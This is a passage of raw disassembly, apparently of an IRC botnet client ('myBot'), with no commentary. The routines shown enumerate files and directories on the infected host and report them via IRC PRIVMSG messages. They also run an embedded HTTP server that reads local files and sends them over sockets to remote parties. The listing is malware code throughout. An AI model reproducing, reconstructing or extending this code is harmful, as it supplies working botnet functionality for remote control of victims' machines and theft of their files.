mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm ; "PM"
ja loc_404B5A
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_404AD3: ; CODE XREF: sub_404807+359�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_416905
add esp, 20h
xor edi, edi
test byte ptr [ebp+var_38C], 10h
jz loc_404CA9
inc [ebp+var_8]
cmp [ebp+arg_8], edi
jz short loc_404B65
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_416B5D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push 200h
push eax
call sub_416B5D
add esp, 28h
jmp loc_404E11
; ---------------------------------------------------------------------------
loc_404B5A: ; CODE XREF: sub_404807+2BE�j
movzx eax, ax
sub eax, 0Ch
jmp loc_404AD3
; ---------------------------------------------------------------------------
loc_404B65: ; CODE XREF: sub_404807+308�j
cmp [ebp+arg_C], edi
jz loc_404C63
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_404B91: ; CODE XREF: sub_404807+38F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404B91
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS_2 ; "%s%s/"
push ebx
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_404BD4: ; CODE XREF: sub_404807+3D2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404BD4
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_404BF8: ; CODE XREF: sub_404807+3F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404BF8
sub eax, esi
cmp eax, 1Eh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_404C1A
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_404C1F
; ---------------------------------------------------------------------------
loc_404C1A: ; CODE XREF: sub_404807+40A�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_404C1F: ; CODE XREF: sub_404807+411�j
push ebx
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_404C32: ; CODE XREF: sub_404807+430�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404C32
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push ebx
jmp loc_404E02
; ---------------------------------------------------------------------------
loc_404C63: ; CODE XREF: sub_404807+361�j
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_416B5D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_404C90: ; CODE XREF: sub_404807+4CA�j
lea eax, [ebp+var_24C]
push 200h
push eax
call sub_416B5D
add esp, 24h
jmp loc_404E11
; ---------------------------------------------------------------------------
loc_404CA9: ; CODE XREF: sub_404807+2FC�j
inc [ebp+var_4]
cmp [ebp+arg_8], edi
jz short loc_404CD3
push edi
push [ebp+var_36C]
call sub_403162
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_404C90
; ---------------------------------------------------------------------------
loc_404CD3: ; CODE XREF: sub_404807+4A8�j
cmp [ebp+arg_C], edi
jz loc_404DE7
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_404CFF: ; CODE XREF: sub_404807+4FD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404CFF
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS ; "%s%s"
push ebx
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_404D42: ; CODE XREF: sub_404807+540�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404D42
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_404D66: ; CODE XREF: sub_404807+564�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404D66
sub eax, esi
cmp eax, 1Fh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_404D88
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_404D8D
; ---------------------------------------------------------------------------
loc_404D88: ; CODE XREF: sub_404807+578�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_404D8D: ; CODE XREF: sub_404807+57F�j
push ebx
push eax
call sub_416B5D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_404DA0: ; CODE XREF: sub_404807+59E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404DA0
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_416B5D
add esp, 1Ch
jmp short loc_404E11
; ---------------------------------------------------------------------------
loc_404DE7: ; CODE XREF: sub_404807+4CF�j
push [ebp+var_36C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push 200h
loc_404E02: ; CODE XREF: sub_404807+457�j
lea eax, [ebp+var_24C]
push eax
call sub_416B5D
add esp, 18h
loc_404E11: ; CODE XREF: sub_404807+34E�j
; sub_404807+49D�j ...
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_404E1A: ; CODE XREF: sub_404807+618�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404E1A
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
cmp [ebp+arg_8], edi
jz short loc_404E45
push 0FAh
call dword_422000 ; Sleep
loc_404E45: ; CODE XREF: sub_404807+25C�j
; sub_404807+274�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call dword_422050 ; FindNextFileA
test eax, eax
jnz loc_404A5C
loc_404E5D: ; CODE XREF: sub_404807+24A�j
push [ebp+var_C]
call dword_42204C ; FindClose
xor esi, esi
cmp [ebp+arg_8], esi
jz short loc_404EA2
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_403162
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_403162
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_416905
add esp, 14h
jmp short loc_404ED0
; ---------------------------------------------------------------------------
loc_404EA2: ; CODE XREF: sub_404807+664�j
cmp [ebp+arg_C], esi
lea eax, [ebp+var_24C]
jz short loc_404EBC
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_416905
pop ecx
pop ecx
jmp short loc_404ED0
; ---------------------------------------------------------------------------
loc_404EBC: ; CODE XREF: sub_404807+6A4�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_416905
add esp, 10h
loc_404ED0: ; CODE XREF: sub_404807+699�j
; sub_404807+6B3�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_404ED9: ; CODE XREF: sub_404807+6D7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404ED9
push esi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A438 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_404807 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EFB proc near ; CODE XREF: sub_405121+12B�p
var_40C = byte ptr -40Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
push ebx
push esi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov [ebp+var_4], 400h
mov [ebp+var_C], esi
call dword_422034 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_404FB8
push esi
push ebx
call dword_422094 ; GetFileSize
mov edx, eax
cmp edx, esi
mov [ebp+var_8], edx
jz short loc_404FB1
push edi
jmp short loc_404F49
; ---------------------------------------------------------------------------
loc_404F46: ; CODE XREF: sub_404EFB+B3�j
mov edx, [ebp+var_8]
loc_404F49: ; CODE XREF: sub_404EFB+49�j
xor eax, eax
cmp [ebp+var_4], edx
mov ecx, 100h
lea edi, [ebp+var_40C]
rep stosd
jbe short loc_404F60
mov [ebp+var_4], edx
loc_404F60: ; CODE XREF: sub_404EFB+60�j
push 2
push esi
neg edx
push edx
push ebx
call dword_422090 ; SetFilePointer
push esi
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push ebx
call dword_42208C ; ReadFile
push esi
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push [ebp+arg_0]
call dword_43A438 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_404FAB
call dword_43A45C ; WSAGetLastError
cmp eax, 2733h
jnz short loc_404FB0
xor eax, eax
loc_404FAB: ; CODE XREF: sub_404EFB+9F�j
sub [ebp+var_8], eax
jnz short loc_404F46
loc_404FB0: ; CODE XREF: sub_404EFB+AC�j
pop edi
loc_404FB1: ; CODE XREF: sub_404EFB+46�j
push ebx
call dword_42202C ; CloseHandle
loc_404FB8: ; CODE XREF: sub_404EFB+31�j
pop esi
pop ebx
leave
retn
sub_404EFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FBC proc near ; CODE XREF: sub_40528F+182�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
mov ecx, eax
push esi
xor esi, esi
lea edx, [ecx+1]
loc_404FCB: ; CODE XREF: sub_404FBC+14�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_404FCB
sub ecx, edx
mov [ebp+arg_0], ecx
jz short loc_404FF6
loc_404FD9: ; CODE XREF: sub_404FBC+38�j
cmp byte ptr [esi+eax], 5Ch
jnz short loc_404FE3
mov byte ptr [esi+eax], 2Fh
loc_404FE3: ; CODE XREF: sub_404FBC+21�j
mov ecx, eax
inc esi
lea edx, [ecx+1]
loc_404FE9: ; CODE XREF: sub_404FBC+32�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_404FE9
sub ecx, edx
cmp esi, ecx
jb short loc_404FD9
loc_404FF6: ; CODE XREF: sub_404FBC+1B�j
pop esi
pop ebx
pop ebp
retn
sub_404FBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FFA proc near ; CODE XREF: sub_409806+5824�p
var_4A4 = byte ptr -4A4h
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A4h
push edi
lea eax, [ebp+var_4A4]
push eax
push 101h
call dword_43A3AC ; WSAStartup
push 6
push 1
push 2
call dword_43A39C ; socket
push [ebp+arg_14]
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
mov [ebp+var_14], 2
call dword_43A4F4 ; ntohs
push [ebp+arg_10]
mov [ebp+var_12], ax
call sub_40873C
pop ecx
mov [ebp+var_10], eax
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
call dword_43A34C ; connect
cmp eax, 0FFFFFFFFh
jz short loc_4050DA
mov eax, [ebp+arg_20]
test eax, eax
jnz short loc_40506D
mov eax, (offset asc_422B08+2)
loc_40506D: ; CODE XREF: sub_404FFA+6C�j
push ebx
push esi
push [ebp+arg_10]
mov ebx, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+var_114]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push ebx
push eax
call sub_416B5D
lea eax, [ebp+var_114]
add esp, 1Ch
lea esi, [eax+1]
loc_40509C: ; CODE XREF: sub_404FFA+A7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40509C
push 0
sub eax, esi
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
call dword_43A438 ; send
push 40h
pop ecx
push 0
push ebx
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
xor esi, esi
lea edi, [ebp+var_114]
rep movsd
call dword_43A304 ; recv
pop esi
pop ebx
loc_4050DA: ; CODE XREF: sub_404FFA+65�j
push [ebp+var_4]
call dword_43A4B0 ; closesocket
call dword_43A4BC ; WSACleanup
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_314]
push eax
call sub_416905
cmp [ebp+arg_C], 0
pop ecx
pop ecx
pop edi
jnz short locret_40511F
push 0
push [ebp+arg_8]
lea eax, [ebp+var_314]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
locret_40511F: ; CODE XREF: sub_404FFA+109�j
leave
retn
sub_404FFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_405121 proc near ; DATA XREF: sub_40528F+24E�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call sub_416B20
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+var_3C8]
push eax
lea eax, [ebp+74h+var_550]
push eax
call sub_416905
lea eax, [ebp+74h+var_2C4]
push eax
lea eax, [ebp+74h+var_654]
push eax
call sub_416905
xor ebx, ebx
add esp, 10h
cmp [ebp+74h+var_A4], ebx
lea eax, [ebp+74h+var_9C]
jz short loc_405189
push offset aTextHtml ; "text/html"
jmp short loc_40518E
; ---------------------------------------------------------------------------
loc_405189: ; CODE XREF: sub_405121+5F�j
push offset aApplicationOct ; "application/octet-stream"
loc_40518E: ; CODE XREF: sub_405121+66�j
push eax
call sub_416905
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call dword_42209C ; GetDateFormatA
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_422098 ; GetTimeFormatA
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_4051FB
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_416905
add esp, 24h
jmp short loc_405213
; ---------------------------------------------------------------------------
loc_4051FB: ; CODE XREF: sub_405121+C1�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_416905
add esp, 28h
loc_405213: ; CODE XREF: sub_405121+D8�j
lea eax, [ebp+74h+var_1654]
lea edx, [eax+1]
loc_40521C: ; CODE XREF: sub_405121+100�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40521C
push ebx
sub eax, edx
push eax
lea eax, [ebp+74h+var_1654]
push eax
push [ebp+74h+var_44C]
call dword_43A438 ; send
cmp [ebp+74h+var_A4], ebx
jnz short loc_405255
lea eax, [ebp+74h+var_550]
push eax
push [ebp+74h+var_44C]
call sub_404EFB
pop ecx
pop ecx
jmp short loc_405272
; ---------------------------------------------------------------------------
loc_405255: ; CODE XREF: sub_405121+11C�j
lea eax, [ebp+74h+var_654]
push eax
push ebx
push [ebp+74h+var_44C]
lea eax, [ebp+74h+var_550]
push eax
call sub_404807
add esp, 10h
loc_405272: ; CODE XREF: sub_405121+132�j
push [ebp+74h+var_44C]
call dword_43A4B0 ; closesocket
push [ebp+74h+var_B4]
call sub_41397A
pop ecx
push ebx
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_405121 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40528F proc near ; CODE XREF: sub_405549+37C�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_210]
rep stosd
mov eax, [ebp+arg_8]
xor esi, esi
cmp byte ptr [eax], 2Fh
mov [ebp+var_4], esi
push eax
jz short loc_4052BD
push offset aS_8 ; "\\%s"
jmp short loc_4052C5
; ---------------------------------------------------------------------------
loc_4052BD: ; CODE XREF: sub_40528F+25�j
mov byte ptr [eax], 5Ch
push offset aS_3 ; "%s"
loc_4052C5: ; CODE XREF: sub_40528F+2C�j
lea eax, [ebp+var_10C]
push eax
call sub_416905
lea eax, [ebp+var_10C]
add esp, 0Ch
xor edi, edi
lea ecx, [eax+1]
loc_4052DF: ; CODE XREF: sub_40528F+55�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4052DF
sub eax, ecx
mov [ebp+arg_8], eax
jz short loc_405365
push 2
pop ebx
loc_4052F0: ; CODE XREF: sub_40528F+D4�j
lea eax, [ebp+var_10C]
lea edx, [eax+1]
loc_4052F9: ; CODE XREF: sub_40528F+6F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4052F9
sub eax, edx
cmp ebx, eax
jnb short loc_405332
cmp [ebp+esi+var_10C], 25h
jnz short loc_405332
cmp [ebp+esi+var_10B], 32h
jnz short loc_405332
cmp [ebp+esi+var_10A], 30h
jnz short loc_405332
inc esi
inc esi
inc ebx
mov [ebp+edi+var_210], 20h
inc ebx
jmp short loc_40534C
; ---------------------------------------------------------------------------
loc_405332: ; CODE XREF: sub_40528F+75�j
; sub_40528F+7F�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_405342
push 5Ch
pop eax
jmp short loc_405345
; ---------------------------------------------------------------------------
loc_405342: ; CODE XREF: sub_40528F+AC�j
movsx eax, al
loc_405345: ; CODE XREF: sub_40528F+B1�j
mov [ebp+edi+var_210], al
loc_40534C: ; CODE XREF: sub_40528F+A1�j
inc esi
lea eax, [ebp+var_10C]
inc ebx
inc edi
lea ecx, [eax+1]
loc_405358: ; CODE XREF: sub_40528F+CE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405358
sub eax, ecx
cmp esi, eax
jb short loc_4052F0
loc_405365: ; CODE XREF: sub_40528F+5C�j
lea eax, [ebp+var_210]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_314]
push offset aSS ; "%s%s"
push eax
call sub_416905
lea eax, [ebp+var_314]
push offset asc_4236F8 ; "\n"
push eax
call sub_417779
add esp, 18h
lea eax, [ebp+var_314]
push eax
call dword_4220A0 ; GetFileAttributesA
xor ebx, ebx
inc ebx
cmp eax, 10h
jz short loc_4053B6
cmp eax, 0FFFFFFFFh
jnz short loc_4053B9
push [ebp+arg_0]
jmp loc_40543E
; ---------------------------------------------------------------------------
loc_4053B6: ; CODE XREF: sub_40528F+118�j
mov [ebp+var_4], ebx
loc_4053B9: ; CODE XREF: sub_40528F+11D�j
cmp [ebp+edi+var_211], 5Ch
jnz short loc_4053C6
mov [ebp+var_4], ebx
loc_4053C6: ; CODE XREF: sub_40528F+132�j
mov eax, [ebp+arg_0]
xor edi, edi
cmp [ebp+var_4], edi
mov [ebp+var_6C4], eax
mov [ebp+var_318], edi
jz short loc_405449
cmp [ebp+arg_C], edi
jz short loc_40543D
lea edi, [ebp+var_314]
dec edi
loc_4053E8: ; CODE XREF: sub_40528F+15F�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4053E8
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
mov esi, offset asc_4239B4 ; "*"
push eax
movsw
call sub_416905
lea eax, [ebp+var_210]
push eax
call sub_404FBC
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_416905
or [ebp+var_330], 0FFFFFFFFh
add esp, 14h
mov [ebp+var_31C], ebx
xor edi, edi
jmp short loc_405498
; ---------------------------------------------------------------------------
loc_40543D: ; CODE XREF: sub_40528F+150�j
push eax
loc_40543E: ; CODE XREF: sub_40528F+122�j
call dword_43A4B0 ; closesocket
jmp loc_405530
; ---------------------------------------------------------------------------
loc_405449: ; CODE XREF: sub_40528F+14B�j
push edi
push edi
push 3
push edi
push ebx
push 80000000h
lea eax, [ebp+var_314]
push eax
call dword_422034 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_405498
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416905
pop ecx
pop ecx
push edi
push esi
mov [ebp+var_31C], edi
call dword_422094 ; GetFileSize
push esi
mov [ebp+var_330], eax
call dword_42202C ; CloseHandle
loc_405498: ; CODE XREF: sub_40528F+1AC�j
; sub_40528F+1D7�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+var_8C4]
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax
call sub_416905
push edi
lea eax, [ebp+var_8C4]
push 4
push eax
call sub_4136B6
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43B244[eax], esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_6C4]
push eax
push offset sub_405121
push edi
push edi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43B254[ecx], eax
jnz short loc_40553F
push [ebp+arg_0]
call dword_43A4B0 ; closesocket
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax
call sub_416905
lea eax, [ebp+var_8C4]
push eax
call sub_401ECD
add esp, 10h
loc_405530: ; CODE XREF: sub_40528F+1B5�j
; sub_40528F+2B8�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405537: ; CODE XREF: sub_40528F+2B6�j
push 5
call dword_422000 ; Sleep
loc_40553F: ; CODE XREF: sub_40528F+26F�j
cmp [ebp+var_318], edi
jz short loc_405537
jmp short loc_405530
sub_40528F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_405549 proc near ; DATA XREF: sub_401141+34C�o
; sub_409806+4A0F�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_416B20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+var_6F0]
rep movsd
push [ebp+var_360]
xor esi, esi
inc esi
mov [eax+3ACh], esi
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_14], esi
mov [ebp+var_24], 2
call dword_43A4F4 ; ntohs
and [ebp+var_20], 0
push 0
push esi
push 2
mov [ebp+var_22], ax
call dword_43A39C ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
mov [ebp+var_8], ebx
jz loc_40591C
mov eax, [ebp+var_358]
imul eax, 234h
mov dword_43B24C[eax], ebx
push 10h
lea eax, [ebp+var_24]
push eax
push ebx
call dword_43A47C ; bind
cmp eax, edi
jz loc_40591C
push 7FFFFFFFh
push ebx
call dword_43A4C8 ; listen
cmp eax, edi
jz loc_40591C
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push ebx
call dword_43A334 ; ioctlsocket
cmp eax, edi
jz loc_40591C
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov [ebp+var_124], ebx
mov [ebp+var_128], esi
mov [ebp+var_4], ebx
lea eax, [ebx+1]
jmp loc_4058FE
; ---------------------------------------------------------------------------
loc_40562E: ; CODE XREF: sub_405549+3CD�j
xor esi, esi
mov [ebp+arg_0], esi
loc_405633: ; CODE XREF: sub_405549+39C�j
lea eax, [ebp+var_23C]
push eax
push esi
call dword_43A3F4 ; __WSAFDIsSet
test eax, eax
jz loc_4058DB
cmp esi, ebx
jnz short loc_4056B0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push ebx
mov [ebp+var_10], 10h
call dword_43A35C ; accept
cmp eax, 0FFFFFFFFh
jz loc_4058DB
mov edx, [ebp+var_128]
xor ecx, ecx
test edx, edx
jbe short loc_405689
loc_40567B: ; CODE XREF: sub_405549+13E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_405689
inc ecx
cmp ecx, edx
jb short loc_40567B
loc_405689: ; CODE XREF: sub_405549+130�j
; sub_405549+139�j
cmp ecx, edx
jnz short loc_40569F
cmp edx, 40h
jnb short loc_40569F
mov [ebp+ecx*4+var_124], eax
inc [ebp+var_128]
loc_40569F: ; CODE XREF: sub_405549+142�j
; sub_405549+147�j
cmp eax, [ebp+var_4]
jbe loc_4058DB
mov [ebp+var_4], eax
jmp loc_4058DB
; ---------------------------------------------------------------------------
loc_4056B0: ; CODE XREF: sub_405549+102�j
mov edx, 400h
xor eax, eax
mov ecx, edx
lea edi, [ebp+var_28F0]
rep stosd
push eax
mov ecx, edx
